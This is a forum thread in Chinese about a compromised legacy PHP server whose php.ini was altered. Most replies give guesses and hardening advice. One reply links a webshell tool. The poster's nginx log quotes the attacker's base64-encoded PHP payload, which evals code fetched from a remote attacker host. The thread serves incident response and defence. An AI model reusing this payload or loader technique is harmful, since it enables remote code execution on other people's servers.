用来跑老项目的服务器的 php.ini 里面的 auto_prepend_file 和 allow_url_include 被修改了,导致请求返回的内容出现了问题,有没有大佬说下这是怎么修改的
1
luoyide2010 261 天前 2
大概是有漏洞被拿到权限呗,除非你能提供源码或者远控环境,单凭几个字描述怎么可能定位到问题?
|
2
xuanbg 261 天前 7
我不是什么安全大佬,我只会一招,就是开白名单。除了 80 和 443 ,其他端口只能我自己的 ip 可以访问。从 2000 年至今 24 年了,服务器都换过好几茬了,从来没有被攻破过。
|
3
tunggt 261 天前
你这只能一点一点排查,就你说的只有这点内容,谁都没法给你解决办法
|
4
kokutou 261 天前 via Android
把软件都升到最新吧。。。
|
5
Seanfuck 261 天前
SSH 被爆破了?看下日志
|
6
pota 261 天前
你这相当于啥都没说啊。。
|
7
dhb233 261 天前
把你的 IP 、域名放出来,看看有没有大佬给你再攻破了
|
8
344457769 261 天前
PHP 很多漏洞可以 getshell ,排查一下 PHP 系统框架版本,找找业务方面的漏洞,重点关注一下上传图片上传文件的逻辑有没有做文件类型判断,把危险的请求体给过滤下,系统数据做好备份后更新下软件吧。
|
9
miyuki 261 天前
1. php 网站程序漏洞被 getshell 了(被植入恶意指令)
2. ssh 弱密码被破解了 3. 其它程序比如 redis 没做好安全防护 很多很多可能 |
10
Greenm 261 天前
描述这么少,问得这么简单,可能同样的字数仅有给 ssh 权限才能帮你排查出来了。
|
13
oneisall8955 261 天前
@xiao17 满猜 openGPS.cn
|
15
I2E 261 天前
https://github.com/rebeyond/Behinder 之前被这个木马搞过
|
20
block0 261 天前 via Android 1
你用宝塔了?
|
21
opengps 261 天前
@oneisall8955 还是你狠,至今日志里天天都有一堆扫描器的痕迹
|
22
l2d 261 天前 via Android
任意文件写 or rce
具体什么问题查流量日志的异常流量 |
23
dzdh 261 天前
selinux 一开。完事。
不要闲着没事蛋疼自己编译 php 。就用系统自带的。 debian 系的用 https://packages.sury.org/php/ rh 系的用 https://rpms.remirepo.net/ 开启 selinux / apparmor 就不可能修改到你的配置文件 |
24
Remember 261 天前
网站写的烂,被拿到 webshell 了。
|
25
idc181906 260 天前 via iPhone 1
你不关闭 22 端口的吗,最近挺多漏扫的,还是关闭了吧。
|
26
han1988 260 天前
套 WAF 呀
|
27
vcn8yjOogEL 260 天前
网页服务器套 SELinux, 嫌麻烦就上 Debian 用 AppArmor, 不过效果会差一点
防火墙只开 80, 443 和一个随机的 ssh 端口 ssh 白名单, 要是白名单的网段大就再上 fail2ban |
28
hefish 260 天前 4
OP: 我有病,医生你快给我开药吧。。。
医生: 要不说说哪儿不舒服? OP:我就是病了,你不是医生吗?快点开药啊。。。 医生:。。。。 |
29
weijancc 260 天前 1
就简单一句, 改为使用 ssh 密钥登录服务器, 禁用密码, 我的服务器都直接开放 22 端口的.
|
30
catamaran 260 天前
网上找破解的 awvs ,自己扫描一下
|
31
way2create 260 天前 1
信息太少了,不过既然是 PHP 老项目,有一个可能是漏扫然后 getshell 了,之前服务器领导就部署了这种 shi 山老项目中招了,还好对方也没整什么大动作。。。emm 领导要这样搞我也管不着,只不过擦屁股有点烦
|
32
justfindu 260 天前
啥信息都没有, log 也没有, 还想看看咋样的, 好自我加强一下
|
33
luozic 260 天前 1
安全问题,扫机器,看能不能处理,不能处理那就换个机器,把数据备份杀毒,再传新服务器-----这次在新机器上注意安全加固和扫一下自己的代码 部署的各个东西的版本有啥漏洞没
|
34
ydpro OP 上午太忙了,下面是 nginx 的部分报错信息
2024/04/03 14:24:55 [error] 85023#0: *418871825 FastCGI sent in stderr: "PHP message: PHP Warning: file_get_contents( http://8.jsc20242.com:81/jsc/jsc.txt): failed to open stream: Connection timed out in data:;base64,PD9waHAgaW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCAib2ZmIik7ZXZhbCgnPz4nLmZpbGVfZ2V0X2NvbnRlbnRzKGJhc2U2NF9kZWNvZGUoJ2FIUjBjRG92THpndWFuTmpNakF5TkRJdVkyOXRPamd4TDJwell5OXFjMk11ZEhoMCcpKSk7Pz4= 不知道攻击者怎么修改 php.ini 的 auto_prepend_file 和 allow_url_include |
35
sofukwird 260 天前 via Android 1
搜一搜 PHP 高危漏洞,然后对比下你所使用的 PHP 版本,如果 PHP 版本比较老的话就会中招
|
36
Metre 260 天前
网址告诉我,我帮你做个漏扫评估
|
37
GUSNYpU376k4Sx2V 260 天前 1
@opengps #21 502 了
|
38
coderzhangsan 260 天前 1
大概率你用宝塔部署 php 环境了吧,如果你用宝塔装了,就又很大概率中招,建议你卸掉宝塔,重新部署环境吧,稍微学一下,部署 php 环境很简单的。
|
39
way2create 259 天前
@coderzhangsan 想起之前有个新来的主管问我为啥之前 Linux 服务器都不用宝塔 说脚本装的命令行维护太麻烦 换成他全装宝塔
|